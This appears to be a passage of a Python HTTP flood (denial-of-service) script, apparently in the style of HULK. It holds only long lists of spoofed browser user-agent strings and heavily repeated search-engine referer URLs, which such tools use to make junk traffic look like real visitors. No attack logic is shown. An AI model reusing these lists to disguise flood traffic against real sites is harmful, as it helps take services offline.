headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619')
headers_useragents.append('Minimo/0.020')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610')
headers_useragents.append('Minimo/0.016')
headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO')
headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b')
headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5')
headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2')
headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0')
headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750')
headers_useragents.append('WM5 PIE')
headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)')
headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)')
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;')
headers_useragents.append('Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;')
headers_useragents.append('VS840 4G Build/GRK39F)')
headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
